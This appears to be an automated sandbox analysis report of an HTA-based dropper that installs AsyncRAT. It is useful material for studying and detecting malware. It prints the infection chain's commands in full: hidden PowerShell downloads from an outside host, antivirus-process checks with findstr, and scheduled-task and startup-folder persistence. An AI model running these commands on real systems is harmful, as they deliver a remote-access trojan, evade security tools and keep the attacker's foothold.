Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062A3 appears 58 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: 24.2.Carter.pif.426ba60.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 24.2.Carter.pif.426ba60.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 35.2.RegAsm.exe.760000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 24.3.Carter.pif.426ba60.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000003.3881968473.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000003.3881936961.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000002.4500843743.000000000426B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 24.3.Carter.pif.426ba60.0.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, JbeTyT6ozehDZJ.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, GKj04XVvJiEzT5.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, JbeTyT6ozehDZJ.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 24.2.Carter.pif.426ba60.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 24.2.Carter.pif.426ba60.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 24.3.Carter.pif.426ba60.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.expl.evad.winHTA@65/62@4/2

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AEA6AD GetLastError,FormatMessageW,

24_2_00AEA6AD

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AD8DE9 AdjustTokenPrivileges,CloseHandle,	24_2_00AD8DE9
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	24_2_00AD9399
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00278DE9 AdjustTokenPrivileges,CloseHandle,	32_2_00278DE9
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00279399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	32_2_00279399

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

14_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AE4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

24_2_00AE4148

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 14_2_004024FB CoCreateInstance,

14_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Code function: 24_2_00AE443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

24_2_00AE443D

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\c2[1].bat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\R2fsONidW19SbcLy
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Temp\downloaded.bat

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat"

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1512,i,15955159168811455781,12168193802298168487,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\downloaded.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1512,i,15955159168811455781,12168193802298168487,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
